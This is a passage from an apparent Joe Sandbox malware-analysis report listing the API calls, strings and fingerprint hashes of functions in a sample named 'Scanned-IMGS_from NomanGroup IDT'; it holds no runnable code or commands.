                                                                                Function 004B5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadIconW.USER32(00000063), ref: 004B5A2E
                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004B5A40
                                                                                • SetWindowTextW.USER32(?,?), ref: 004B5A57
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 004B5A6C
                                                                                • SetWindowTextW.USER32(00000000,?), ref: 004B5A72
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 004B5A82
                                                                                • SetWindowTextW.USER32(00000000,?), ref: 004B5A88
                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004B5AA9
                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004B5AC3
                                                                                • GetWindowRect.USER32(?,?), ref: 004B5ACC
                                                                                • _wcslen.LIBCMT ref: 004B5B33
                                                                                • SetWindowTextW.USER32(?,?), ref: 004B5B6F
                                                                                • GetDesktopWindow.USER32 ref: 004B5B75
                                                                                • GetWindowRect.USER32(00000000), ref: 004B5B7C
                                                                                • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 004B5BD3
                                                                                • GetClientRect.USER32(?,?), ref: 004B5BE0
                                                                                • PostMessageW.USER32(?,00000005,00000000,?), ref: 004B5C05
                                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 004B5C2F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                • String ID:
                                                                                • API String ID: 895679908-0
                                                                                • Opcode ID: 1b59e837d7ba7bfb3f018ba706dff3f10323bf325301516c848e2c09374410f1
                                                                                • Instruction ID: 9873ec22693978a8a4f265311d0f385d8b286869a9d13e29d8a47cfb8cc9b8db
                                                                                • Opcode Fuzzy Hash: 1b59e837d7ba7bfb3f018ba706dff3f10323bf325301516c848e2c09374410f1
                                                                                • Instruction Fuzzy Hash: C2718F31900B05AFDB20DFA9CD85BAFBBF5FF48704F104529E542A66A0D778B941CB28
                                                                                Function 004B30F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen
                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[Q
                                                                                • API String ID: 176396367-4233246236
                                                                                • Opcode ID: 47c13942dc3a4437df0c0df1d4c96ff8e15833514a1c66c91ef883af7f71f9b2
                                                                                • Instruction ID: cd64951724aedd834e61dc733a8b9d837fe17a16ac1f1a0d6422c6ef76a28ef9
                                                                                • Opcode Fuzzy Hash: 47c13942dc3a4437df0c0df1d4c96ff8e15833514a1c66c91ef883af7f71f9b2
                                                                                • Instruction Fuzzy Hash: 39E12831A00516EBCB18DF7AC4416EFBBB0BF54715F54811BE856A7240EB38AE8987B4
                                                                                Function 004700C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 004700C6
                                                                                  • Part of subcall function 004700ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0052070C,00000FA0,2ACE7588,?,?,?,?,004923B3,000000FF), ref: 0047011C
                                                                                  • Part of subcall function 004700ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,004923B3,000000FF), ref: 00470127
                                                                                  • Part of subcall function 004700ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,004923B3,000000FF), ref: 00470138
                                                                                  • Part of subcall function 004700ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0047014E
                                                                                  • Part of subcall function 004700ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0047015C
                                                                                  • Part of subcall function 004700ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0047016A
                                                                                  • Part of subcall function 004700ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00470195
                                                                                  • Part of subcall function 004700ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004701A0
                                                                                • ___scrt_fastfail.LIBCMT ref: 004700E7
                                                                                  • Part of subcall function 004700A3: __onexit.LIBCMT ref: 004700A9
                                                                                Strings
                                                                                • WakeAllConditionVariable, xrefs: 00470162
                                                                                • kernel32.dll, xrefs: 00470133
                                                                                • SleepConditionVariableCS, xrefs: 00470154
                                                                                • InitializeConditionVariable, xrefs: 00470148
                                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00470122
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                • API String ID: 66158676-1714406822
                                                                                • Opcode ID: 9dd4cc5057c5f788cd0612e7f8bd32e31cd798d366accfa26e064837c4a889f2
                                                                                • Instruction ID: a8b1af58709a9faf20185ae29eb57b6a03c78b4776a01c5728eeb7b0c30e7c09
                                                                                • Opcode Fuzzy Hash: 9dd4cc5057c5f788cd0612e7f8bd32e31cd798d366accfa26e064837c4a889f2
                                                                                • Instruction Fuzzy Hash: 9E217C32642740EFD7206B75BC85FAA7B94EF05B61F14813BF805962D2DB6D98048A9C
                                                                                Function 004C44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharLowerBuffW.USER32(00000000,00000000,004ECC08), ref: 004C4527
                                                                                • _wcslen.LIBCMT ref: 004C453B
                                                                                • _wcslen.LIBCMT ref: 004C4599
                                                                                • _wcslen.LIBCMT ref: 004C45F4
                                                                                • _wcslen.LIBCMT ref: 004C463F
                                                                                • _wcslen.LIBCMT ref: 004C46A7
                                                                                  • Part of subcall function 0046F9F2: _wcslen.LIBCMT ref: 0046F9FD
                                                                                • GetDriveTypeW.KERNEL32(?,00516BF0,00000061), ref: 004C4743
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharDriveLowerType
                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                • API String ID: 2055661098-1000479233
                                                                                • Opcode ID: baad44252caa35779691ac0c887a9659b90c0b0338d96afca5acebe6c4af5e87
                                                                                • Instruction ID: 9c43a50ddb83566bd6a2cd24a8101f51520fe8267ae6d00a538073d20ac38177
                                                                                • Opcode Fuzzy Hash: baad44252caa35779691ac0c887a9659b90c0b0338d96afca5acebe6c4af5e87
                                                                                • Instruction Fuzzy Hash: 7CB122796083029FC350DF29C9A0E6BB7E0AFE5724F50491EF59683292D738D845CA6A
                                                                                Function 004E911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00469BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00469BB2
                                                                                • DragQueryPoint.SHELL32(?,?), ref: 004E9147
                                                                                  • Part of subcall function 004E7674: ClientToScreen.USER32(?,?), ref: 004E769A
                                                                                  • Part of subcall function 004E7674: GetWindowRect.USER32(?,?), ref: 004E7710
                                                                                  • Part of subcall function 004E7674: PtInRect.USER32(?,?,004E8B89), ref: 004E7720
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 004E91B0
                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 004E91BB
                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004E91DE
                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 004E9225
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 004E923E
                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 004E9255
                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 004E9277
                                                                                • DragFinish.SHELL32(?), ref: 004E927E
                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 004E9371
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#R
                                                                                • API String ID: 221274066-4113308805
                                                                                • Opcode ID: 262cbdb6a3a94dab646caf1fd2db5231403d4f89078d87fc8b364ac7f6b667a3
                                                                                • Instruction ID: d9d7a375c02579cbbd181caa31421b794e83d027bd28beda7f3b07b00b11c1ab
                                                                                • Opcode Fuzzy Hash: 262cbdb6a3a94dab646caf1fd2db5231403d4f89078d87fc8b364ac7f6b667a3
                                                                                • Instruction Fuzzy Hash: 06618A71108340AFC701DF65DC85DAFBBE8FF89754F00092EF991961A2DB349A4ACB5A
                                                                                Function 004DAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 004DB198
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004DB1B0
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004DB1D4
                                                                                • _wcslen.LIBCMT ref: 004DB200
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004DB214
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004DB236
                                                                                • _wcslen.LIBCMT ref: 004DB332
                                                                                  • Part of subcall function 004C05A7: GetStdHandle.KERNEL32(000000F6), ref: 004C05C6
                                                                                • _wcslen.LIBCMT ref: 004DB34B
                                                                                • _wcslen.LIBCMT ref: 004DB366
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004DB3B6
                                                                                • GetLastError.KERNEL32(00000000), ref: 004DB407
                                                                                • CloseHandle.KERNEL32(?), ref: 004DB439
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004DB44A
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004DB45C
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004DB46E
                                                                                • CloseHandle.KERNEL32(?), ref: 004DB4E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 2178637699-0
                                                                                • Opcode ID: d0fb26297eb0674a7e3c3ab30c34f025a0986e5b31a19e328328aeb78f88c0f5
                                                                                • Instruction ID: 1223fe317e36cd8a32e96894f930c76ef53b35b83cc548d323f274e47701be3a
                                                                                • Opcode Fuzzy Hash: d0fb26297eb0674a7e3c3ab30c34f025a0986e5b31a19e328328aeb78f88c0f5
                                                                                • Instruction Fuzzy Hash: 69F17931504240DFC715EF25C891A6ABBE0EF85318F15855FE8958B3A2DB39EC05CB9A
                                                                                Function 0045326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMenuItemCount.USER32(00521990), ref: 00492F8D
                                                                                • GetMenuItemCount.USER32(00521990), ref: 0049303D
                                                                                • GetCursorPos.USER32(?), ref: 00493081
                                                                                • SetForegroundWindow.USER32(00000000), ref: 0049308A
                                                                                • TrackPopupMenuEx.USER32(00521990,00000000,?,00000000,00000000,00000000), ref: 0049309D
                                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004930A9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                • String ID: 0
                                                                                • API String ID: 36266755-4108050209
                                                                                • Opcode ID: 99e140d3514d041325bc3f1e4441a4631fe8cc851f8af898f0ca61ee63e10949
                                                                                • Instruction ID: 8ae6b87dbab4c4fccdb9dd36487203092b9101799ed8fcf0459ed093c380032b
                                                                                • Opcode Fuzzy Hash: 99e140d3514d041325bc3f1e4441a4631fe8cc851f8af898f0ca61ee63e10949
                                                                                • Instruction Fuzzy Hash: D7712930640215BEEF218F25CD89FABBF64FF01365F20422BF9146A2D1C7B5A914D799
                                                                                Function 004E6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,?), ref: 004E6DEB
                                                                                  • Part of subcall function 00456B57: _wcslen.LIBCMT ref: 00456B6A
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 004E6E5F
                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 004E6E81
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004E6E94
                                                                                • DestroyWindow.USER32(?), ref: 004E6EB5
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00450000,00000000), ref: 004E6EE4
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004E6EFD
                                                                                • GetDesktopWindow.USER32 ref: 004E6F16
                                                                                • GetWindowRect.USER32(00000000), ref: 004E6F1D
                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 004E6F35
                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 004E6F4D
                                                                                  • Part of subcall function 00469944: GetWindowLongW.USER32(?,000000EB), ref: 00469952
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                • String ID: 0$tooltips_class32
                                                                                • API String ID: 2429346358-3619404913
                                                                                • Opcode ID: a72ddfe4334148df7b9b408d4be8afd1933461909705ccb4df1ede17c42fb293
                                                                                • Instruction ID: 9542bd6ff9434e3f0730eb58eecd5f597b5d554d2b02ebdbbab2f13b95953a97
                                                                                • Opcode Fuzzy Hash: a72ddfe4334148df7b9b408d4be8afd1933461909705ccb4df1ede17c42fb293
                                                                                • Instruction Fuzzy Hash: D4717C70504384AFDB21CF29D884B6BBBE9FBA9345F04041EF98987261C774AD4ADB19
                                                                                Function 004CC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004CC4B0
                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 004CC4C3
                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 004CC4D7
                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004CC4F0
                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 004CC533
                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 004CC549
                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004CC554
                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004CC584
                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 004CC5DC
                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 004CC5F0
                                                                                • InternetCloseHandle.WININET(00000000), ref: 004CC5FB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                • String ID:
                                                                                • API String ID: 3800310941-3916222277
                                                                                • Opcode ID: b8e976e736932ad3d5b552c4e2d2659f5988e51346ebbe35378898d65c5d08fb
                                                                                • Instruction ID: b747721a038d738c8d52e4d607ed2aec7d4b9bab42b007af53246d613bf421ea
                                                                                • Opcode Fuzzy Hash: b8e976e736932ad3d5b552c4e2d2659f5988e51346ebbe35378898d65c5d08fb
                                                                                • Instruction Fuzzy Hash: D1518DB8500205BFDB618F61C9C8FAB7BBCFF08344F00842EF94996251DB38E9459B68
                                                                                Function 004E856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 004E8592
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 004E85A2
                                                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004E85AD
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004E85BA
                                                                                • GlobalLock.KERNEL32(00000000), ref: 004E85C8
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004E85D7
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004E85E0
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004E85E7
                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 004E85F8
                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,004EFC38,?), ref: 004E8611
                                                                                • GlobalFree.KERNEL32(00000000), ref: 004E8621
                                                                                • GetObjectW.GDI32(?,00000018,000000FF), ref: 004E8641
                                                                                • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 004E8671
                                                                                • DeleteObject.GDI32(00000000), ref: 004E8699
                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004E86AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                • String ID:
                                                                                • API String ID: 3840717409-0
                                                                                • Opcode ID: a76d2a2d52f1c7b9a7eb7d5ba22a82c0175db1ed6d3134cc6840da788675c8b8
                                                                                • Instruction ID: 620a6ff6c0106cd539a7c751f9c0e5118a4304464e7710eabee683fd7ee1f039
                                                                                • Opcode Fuzzy Hash: a76d2a2d52f1c7b9a7eb7d5ba22a82c0175db1ed6d3134cc6840da788675c8b8
                                                                                • Instruction Fuzzy Hash: 9C412B75600248BFDB11DFA5CC88EAB7BB8FF89711F104069F919EB261DB349902CB24
                                                                                Function 004C14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(00000000), ref: 004C1502
                                                                                • VariantCopy.OLEAUT32(?,?), ref: 004C150B
                                                                                • VariantClear.OLEAUT32(?), ref: 004C1517
                                                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 004C15FB
                                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 004C1657
                                                                                • VariantInit.OLEAUT32(?), ref: 004C1708
                                                                                • SysFreeString.OLEAUT32(?), ref: 004C178C
                                                                                • VariantClear.OLEAUT32(?), ref: 004C17D8
                                                                                • VariantClear.OLEAUT32(?), ref: 004C17E7
                                                                                • VariantInit.OLEAUT32(00000000), ref: 004C1823
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                • API String ID: 1234038744-3931177956
                                                                                • Opcode ID: f8f7177d592fe8d7c9eeec37d1425d5ddda347ba81b0a114fd76a0de1031e8a9
                                                                                • Instruction ID: ff75408efad277d273aab2ddf09b0b0fb1caf01794854f792ffaf29bc0e05cb9
                                                                                • Opcode Fuzzy Hash: f8f7177d592fe8d7c9eeec37d1425d5ddda347ba81b0a114fd76a0de1031e8a9
                                                                                • Instruction Fuzzy Hash: 8ED12475600110EBCB409F65D885F79B7B1BF46700F90805FF806AB2A2DB38EC46DB5A
                                                                                Function 004DB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                  • Part of subcall function 004DC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004DB6AE,?,?), ref: 004DC9B5
                                                                                  • Part of subcall function 004DC998: _wcslen.LIBCMT ref: 004DC9F1
